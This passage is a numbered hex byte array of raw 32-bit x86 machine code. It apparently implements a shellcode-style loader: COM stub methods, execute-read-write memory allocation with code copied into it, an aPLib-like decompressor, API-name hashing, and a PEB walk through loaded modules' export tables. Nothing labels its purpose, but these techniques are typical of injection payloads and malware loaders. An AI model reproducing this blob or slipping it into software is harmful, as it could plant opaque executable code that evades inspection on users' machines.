1639 0x00, 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1640 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1641 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1642 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1643 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1644 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1645 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1646 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1647 0x80, 0x5d, 0xc2, 0x10, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1648 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1649 0x80, 0x5d, 0xc2, 0x14, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00,
1650 0x80, 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x18, 0x8b,
1651 0x45, 0x08, 0x8b, 0x40, 0x14, 0x8b, 0x40, 0x44, 0x8b, 0x55, 0x0c, 0x89,
1652 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00,
1653 0xc9, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1654 0x5d, 0xc2, 0x0c, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1655 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1656 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x40, 0x00, 0x80,
1657 0x5d, 0xc2, 0x08, 0x00, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x1c, 0xc7, 0x00,
1658 0x00, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x18,
1659 0x00, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x08, 0x0f, 0xaf, 0x45, 0x0c, 0x5d,
1660 0xc3, 0x55, 0x89, 0xe5, 0x8b, 0x45, 0x18, 0xc7, 0x00, 0x00, 0x00, 0x00,
1661 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc2, 0x14, 0x00, 0x55, 0x89,
1662 0xe5, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x5d, 0xc3, 0x55,
1663 0x89, 0xe5, 0x83, 0xec, 0x58, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01,
1664 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00, 0x89, 0x45, 0xf4, 0x8b,
1665 0x45, 0x08, 0x05, 0x28, 0x03, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x8b,
1666 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xa2, 0xbf, 0xff, 0xff, 0x89, 0x45,
1667 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00,
1668 0xe9, 0x02, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x05, 0x9c, 0x05, 0x00,
1669 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
1670 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
1671 0x04, 0x24, 0xe8, 0x10, 0xbd, 0xff, 0xff, 0x89, 0x45, 0xec, 0x83, 0x7d,
1672 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9, 0x01,
1673 0x00, 0x00, 0xb8, 0x89, 0x5d, 0x40, 0x00, 0xba, 0x74, 0x5d, 0x40, 0x00,
1674 0x29, 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8, 0x85, 0xc0, 0x79, 0x0a,
1675 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x01, 0x00, 0x00, 0x8b, 0x45,
1676 0xec, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xe8, 0x89, 0x45, 0xd8, 0x8b, 0x45,
1677 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x10,
1678 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00, 0x00, 0x8d, 0x45, 0xd8, 0x89,
1679 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04,
1680 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd4, 0x0b, 0x00, 0x00, 0x89, 0x45,
1681 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00,
1682 0xe9, 0x5a, 0x01, 0x00, 0x00, 0xe8, 0x6e, 0x02, 0x00, 0x00, 0xba, 0x74,
1683 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01, 0xc2,
1684 0x8b, 0x45, 0xe8, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b,
1685 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x90, 0x05, 0x00, 0x00, 0x8b, 0x45,
1686 0xe0, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14, 0x8d, 0x55, 0xdc, 0x89,
1687 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x45, 0xd8, 0x89, 0x44,
1688 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24,
1689 0xff, 0xff, 0xff, 0xff, 0xe8, 0x69, 0x0b, 0x00, 0x00, 0x8b, 0x45, 0x08,
1690 0x05, 0xac, 0x05, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00,
1691 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04,
1692 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x10, 0xbc, 0xff, 0xff, 0x89,
1693 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00,
1694 0x00, 0xe9, 0xc9, 0x00, 0x00, 0x00, 0xb8, 0xaa, 0x5d, 0x40, 0x00, 0xba,
1695 0x95, 0x5d, 0x40, 0x00, 0x29, 0xd0, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8,
1696 0x85, 0xc0, 0x79, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa9, 0x00,
1697 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0xe8, 0x89,
1698 0x45, 0xd8, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45, 0xe0,
1699 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00, 0x00,
1700 0x8d, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44,
1701 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd4, 0x0a,
1702 0x00, 0x00, 0x89, 0x45, 0xe4, 0x83, 0x7d, 0xe4, 0x00, 0x79, 0x07, 0xb8,
1703 0x00, 0x00, 0x00, 0x00, 0xeb, 0x5d, 0xe8, 0x71, 0x01, 0x00, 0x00, 0xba,
1704 0x95, 0x5d, 0x40, 0x00, 0xb9, 0x14, 0x61, 0x40, 0x00, 0x29, 0xca, 0x01,
1705 0xc2, 0x8b, 0x45, 0xe8, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04,
1706 0x8b, 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x93, 0x04, 0x00, 0x00, 0x8b,
1707 0x45, 0xe0, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14, 0x8d, 0x55, 0xdc,
1708 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d, 0x45, 0xd8, 0x89,
1709 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd4, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04,
1710 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x6c, 0x0a, 0x00, 0x00, 0xb8, 0x01,
1711 0x00, 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0xb8, 0x01, 0x00, 0x00,
1712 0x00, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x48, 0x8b, 0x45, 0x08,
1713 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
1714 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x08, 0x05, 0x3c, 0x03, 0x00, 0x00, 0x89,
1715 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x52, 0xbd,
1716 0xff, 0xff, 0x89, 0x45, 0xf0, 0x8b, 0x45, 0x08, 0x05, 0xbc, 0x05, 0x00,
1717 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24,
1718 0x08, 0x8b, 0x45, 0xf0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
1719 0x04, 0x24, 0xe8, 0xd0, 0xba, 0xff, 0xff, 0x89, 0x45, 0xec, 0x83, 0x7d,
1720 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa0, 0x00,
1721 0x00, 0x00, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xdc, 0x04,
1722 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x44, 0x24, 0x14, 0x8d, 0x45,
1723 0xe4, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0x40, 0x00, 0x00,
1724 0x00, 0x8d, 0x45, 0xdc, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd8, 0x89,
1725 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xb3,
1726 0x09, 0x00, 0x00, 0x89, 0x45, 0xe8, 0x83, 0x7d, 0xe8, 0x00, 0x79, 0x07,
1727 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x53, 0x8b, 0x45, 0x08, 0x05, 0xe1,
1728 0x05, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08, 0x04, 0x00, 0x00, 0x00, 0x89,
1729 0x44, 0x24, 0x04, 0x8b, 0x45, 0xec, 0x89, 0x04, 0x24, 0xe8, 0x7c, 0x03,
1730 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x55, 0xf4, 0x89, 0x54, 0x24, 0x14,
1731 0x8d, 0x55, 0xe0, 0x89, 0x54, 0x24, 0x10, 0x89, 0x44, 0x24, 0x0c, 0x8d,
1732 0x45, 0xdc, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x45, 0xd8, 0x89, 0x44, 0x24,
1733 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x55, 0x09, 0x00,
1734 0x00, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xc9, 0xc3, 0xe8, 0x00, 0x00, 0x00,
1735 0x00, 0x58, 0x83, 0xe8, 0x05, 0xc3, 0x90, 0x90, 0x55, 0x89, 0xe5, 0x83,
1736 0xec, 0x10, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x0c, 0x8d, 0x48, 0xff, 0x8b,
1737 0x55, 0x08, 0x89, 0x4a, 0x0c, 0x85, 0xc0, 0x75, 0x23, 0x8b, 0x45, 0x08,
1738 0x8b, 0x00, 0x8d, 0x48, 0x01, 0x8b, 0x55, 0x08, 0x89, 0x0a, 0x0f, 0xb6,
1739 0x00, 0x0f, 0xb6, 0xd0, 0x8b, 0x45, 0x08, 0x89, 0x50, 0x08, 0x8b, 0x45,
1740 0x08, 0xc7, 0x40, 0x0c, 0x07, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
1741 0x40, 0x08, 0xc1, 0xe8, 0x07, 0x83, 0xe0, 0x01, 0x89, 0x45, 0xfc, 0x8b,
1742 0x45, 0x08, 0x8b, 0x40, 0x08, 0x8d, 0x14, 0x00, 0x8b, 0x45, 0x08, 0x89,
1743 0x50, 0x08, 0x8b, 0x45, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83,
1744 0xec, 0x14, 0xc7, 0x45, 0xf8, 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf8,
1745 0x8d, 0x1c, 0x00, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x82, 0xff,
1746 0xff, 0xff, 0x01, 0xd8, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x08, 0x89, 0x04,
1747 0x24, 0xe8, 0x72, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x75, 0xdb, 0x8b, 0x45,
1748 0xf8, 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x53, 0x83, 0xec,
1749 0x34, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xd4, 0x8b, 0x45, 0x0c, 0x89, 0x45,
1750 0xd8, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf0, 0xff,
1751 0xff, 0xff, 0xff, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45,
1752 0xe8, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xd4, 0x8d, 0x42, 0x01, 0x89,
1753 0x45, 0xd4, 0x8b, 0x45, 0xd8, 0x8d, 0x48, 0x01, 0x89, 0x4d, 0xd8, 0x0f,
1754 0xb6, 0x12, 0x88, 0x10, 0xe9, 0x0f, 0x02, 0x00, 0x00, 0x8d, 0x45, 0xd4,
1755 0x89, 0x04, 0x24, 0xe8, 0x10, 0xff, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
1756 0xde, 0x01, 0x00, 0x00, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xfd,
1757 0xfe, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0xe3, 0x00, 0x00, 0x00, 0x8d,
1758 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xea, 0xfe, 0xff, 0xff, 0x85, 0xc0,
1759 0x74, 0x6b, 0xc7, 0x45, 0xf8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xe4,
1760 0x04, 0x00, 0x00, 0x00, 0xeb, 0x1a, 0x8b, 0x45, 0xf8, 0x8d, 0x1c, 0x00,
1761 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24, 0xe8, 0xc5, 0xfe, 0xff, 0xff, 0x01,
1762 0xd8, 0x89, 0x45, 0xf8, 0x83, 0x6d, 0xe4, 0x01, 0x83, 0x7d, 0xe4, 0x00,
1763 0x75, 0xe0, 0x83, 0x7d, 0xf8, 0x00, 0x74, 0x1d, 0x8b, 0x55, 0xd8, 0x8b,
1764 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12,
1765 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xd8, 0xeb,
1766 0x0c, 0x8b, 0x45, 0xd8, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd8, 0xc6, 0x00,
1767 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x6f, 0x01, 0x00,
1768 0x00, 0x8b, 0x45, 0xd4, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd4, 0x0f, 0xb6,
1769 0x00, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0x83, 0xe0,
1770 0x01, 0x83, 0xc0, 0x02, 0x89, 0x45, 0xf4, 0xd1, 0x6d, 0xf8, 0x83, 0x7d,
1771 0xf8, 0x00, 0x74, 0x29, 0xeb, 0x1f, 0x8b, 0x55, 0xd8, 0x8b, 0x45, 0xf8,
1772 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f, 0xb6, 0x12, 0x88, 0x10,
1773 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45, 0xd8, 0x83, 0x6d, 0xf4,
1774 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0xeb, 0x07, 0xc7, 0x45, 0xe8,
1775 0x01, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xf8, 0x89, 0x45, 0xf0, 0xc7, 0x45,
1776 0xec, 0x01, 0x00, 0x00, 0x00, 0xe9, 0x06, 0x01, 0x00, 0x00, 0x8d, 0x45,
1777 0xd4, 0x89, 0x04, 0x24, 0xe8, 0x66, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf8,
1778 0x83, 0x7d, 0xec, 0x00, 0x75, 0x46, 0x83, 0x7d, 0xf8, 0x02, 0x75, 0x40,
1779 0x8b, 0x45, 0xf0, 0x89, 0x45, 0xf8, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24,
1780 0xe8, 0x46, 0xfe, 0xff, 0xff, 0x89, 0x45, 0xf4, 0xeb, 0x1f, 0x8b, 0x55,
1781 0xd8, 0x8b, 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f,
1782 0xb6, 0x12, 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45,
1783 0xd8, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0xe9,
1784 0x85, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x06, 0x83, 0x6d,
1785 0xf8, 0x03, 0xeb, 0x04, 0x83, 0x6d, 0xf8, 0x02, 0xc1, 0x65, 0xf8, 0x08,
1786 0x8b, 0x45, 0xd4, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xd4, 0x0f, 0xb6, 0x00,
1787 0x0f, 0xb6, 0xc0, 0x01, 0x45, 0xf8, 0x8d, 0x45, 0xd4, 0x89, 0x04, 0x24,
1788 0xe8, 0xe6, 0xfd, 0xff, 0xff, 0x89, 0x45, 0xf4, 0x81, 0x7d, 0xf8, 0xff,
1789 0x7c, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf4, 0x01, 0x81, 0x7d, 0xf8,
1790 0xff, 0x04, 0x00, 0x00, 0x76, 0x04, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d,
1791 0xf8, 0x7f, 0x77, 0x25, 0x83, 0x45, 0xf4, 0x02, 0xeb, 0x1f, 0x8b, 0x55,
1792 0xd8, 0x8b, 0x45, 0xf8, 0xf7, 0xd8, 0x01, 0xc2, 0x8b, 0x45, 0xd8, 0x0f,
1793 0xb6, 0x12, 0x88, 0x10, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0x45,
1794 0xd8, 0x83, 0x6d, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x00, 0x75, 0xdb, 0x8b,
1795 0x45, 0xf8, 0x89, 0x45, 0xf0, 0xc7, 0x45, 0xec, 0x01, 0x00, 0x00, 0x00,
1796 0xeb, 0x1e, 0x8b, 0x55, 0xd4, 0x8d, 0x42, 0x01, 0x89, 0x45, 0xd4, 0x8b,
1797 0x45, 0xd8, 0x8d, 0x48, 0x01, 0x89, 0x4d, 0xd8, 0x0f, 0xb6, 0x12, 0x88,
1798 0x10, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0x83, 0x7d, 0xe8, 0x00,
1799 0x0f, 0x84, 0xe7, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0xd8, 0x2b, 0x45, 0x0c,
1800 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x90, 0x90, 0x90, 0x55, 0x89, 0xe5, 0x83,
1801 0xec, 0x10, 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0xeb, 0x0e, 0x8b, 0x45,
1802 0x0c, 0x89, 0xc2, 0x8b, 0x45, 0xfc, 0x88, 0x10, 0x83, 0x45, 0xfc, 0x01,
1803 0x8b, 0x45, 0x10, 0x8d, 0x50, 0xff, 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75,
1804 0xe5, 0x8b, 0x45, 0x08, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10,
1805 0x8b, 0x45, 0x08, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xf8,
1806 0xeb, 0x13, 0x8b, 0x45, 0xf8, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xfc, 0x88,
1807 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x45, 0xf8, 0x01, 0x8b, 0x45, 0x10,
1808 0x8d, 0x50, 0xff, 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75, 0xe0, 0x8b, 0x45,
1809 0x08, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x56, 0x53, 0x8b, 0x5d, 0x08, 0x8b,
1810 0x75, 0x0c, 0xeb, 0x32, 0x89, 0xd8, 0x8d, 0x58, 0x01, 0x0f, 0xb6, 0x10,
1811 0x89, 0xf0, 0x8d, 0x70, 0x01, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74, 0x1e,
1812 0x8d, 0x43, 0xff, 0x0f, 0xb6, 0x10, 0x8d, 0x46, 0xff, 0x0f, 0xb6, 0x00,
1813 0x38, 0xc2, 0x73, 0x07, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xeb, 0x19, 0xb8,
1814 0x01, 0x00, 0x00, 0x00, 0xeb, 0x12, 0x8b, 0x45, 0x10, 0x8d, 0x50, 0xff,
1815 0x89, 0x55, 0x10, 0x85, 0xc0, 0x75, 0xc1, 0xb8, 0x00, 0x00, 0x00, 0x00,
1816 0x5b, 0x5e, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0xeb, 0x1f, 0x8b, 0x45, 0x08,
1817 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x74,
1818 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x83, 0x45, 0x08, 0x01,
1819 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1820 0x74, 0x0a, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xcd,
1821 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f,
1822 0xb6, 0xc0, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x08, 0xeb, 0x2f,
1823 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00,
1824 0x38, 0xc2, 0x75, 0x1b, 0x8b, 0x45, 0x0c, 0x89, 0x44, 0x24, 0x04, 0x8b,
1825 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x8e, 0xff, 0xff, 0xff, 0x85, 0xc0,
1826 0x74, 0x05, 0x8b, 0x45, 0x08, 0xeb, 0x13, 0x83, 0x45, 0x08, 0x01, 0x8b,
1827 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc7, 0xb8, 0x00, 0x00,
1828 0x00, 0x00, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0xeb, 0x18, 0x8b, 0x45, 0x08,
1829 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x38, 0xc2, 0x75,
1830 0x1e, 0x83, 0x45, 0x08, 0x01, 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08,
1831 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x0d, 0x8b, 0x45, 0x0c, 0x0f, 0xb6,
1832 0x00, 0x84, 0xc0, 0x75, 0xd4, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0x08, 0x0f,
1833 0xb6, 0x00, 0x0f, 0xbe, 0xd0, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x0f,
1834 0xbe, 0xc8, 0x89, 0xd0, 0x29, 0xc8, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0xeb,
1835 0x27, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x89, 0xc2,
1836 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x83, 0xc8, 0x20, 0x38, 0xc2, 0x74,
1837 0x07, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x2a, 0x83, 0x45, 0x08, 0x01,
1838 0x83, 0x45, 0x0c, 0x01, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x00, 0x84, 0xc0,
1839 0x74, 0x0a, 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x75, 0xc5,
1840 0x8b, 0x45, 0x0c, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x0f, 0x94, 0xc0, 0x0f,
1841 0xb6, 0xc0, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x10, 0xc7, 0x45,
1842 0xfc, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf8, 0x05, 0x05, 0xc2, 0x26,
1843 0xeb, 0x24, 0x8b, 0x45, 0xfc, 0x8d, 0x50, 0x01, 0x89, 0x55, 0xfc, 0x8b,
1844 0x55, 0x08, 0x01, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x89, 0x45, 0xf6, 0x0f,
1845 0xb7, 0x55, 0xf6, 0x8b, 0x45, 0xf8, 0xc1, 0xc8, 0x08, 0x01, 0xd0, 0x31,
1846 0x45, 0xf8, 0x8b, 0x55, 0x08, 0x8b, 0x45, 0xfc, 0x01, 0xd0, 0x0f, 0xb6,
1847 0x00, 0x84, 0xc0, 0x75, 0xcd, 0x8b, 0x45, 0xf8, 0xc9, 0xc3, 0x55, 0x89,
1848 0xe5, 0x53, 0x83, 0xec, 0x64, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x85, 0xc0,
1849 0x74, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xe1, 0x02, 0x00, 0x00,
1850 0xc7, 0x45, 0xac, 0x30, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xac, 0x64, 0x8b,
1851 0x00, 0x89, 0x45, 0xa8, 0x8b, 0x45, 0xa8, 0x89, 0x45, 0xdc, 0x8b, 0x45,
1852 0xdc, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xf8, 0x00, 0x00,
1853 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8,
1854 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf0, 0xe9, 0x82, 0x00, 0x00, 0x00, 0x8b,
1855 0x45, 0xf0, 0x8b, 0x40, 0x18, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x89,
1856 0x45, 0xd4, 0x8b, 0x45, 0xd4, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45,
1857 0xf4, 0x01, 0xd0, 0x89, 0x45, 0xd0, 0x8b, 0x45, 0xd0, 0x83, 0xc0, 0x78,
1858 0x89, 0x45, 0xcc, 0x8b, 0x45, 0xcc, 0x8b, 0x00, 0x89, 0x45, 0xc8, 0x83,
1859 0x7d, 0xc8, 0x00, 0x74, 0x40, 0x8b, 0x55, 0xf4, 0x8b, 0x45, 0xc8, 0x01,
1860 0xd0, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0xf8, 0x8b, 0x50, 0x0c, 0x8b, 0x45,
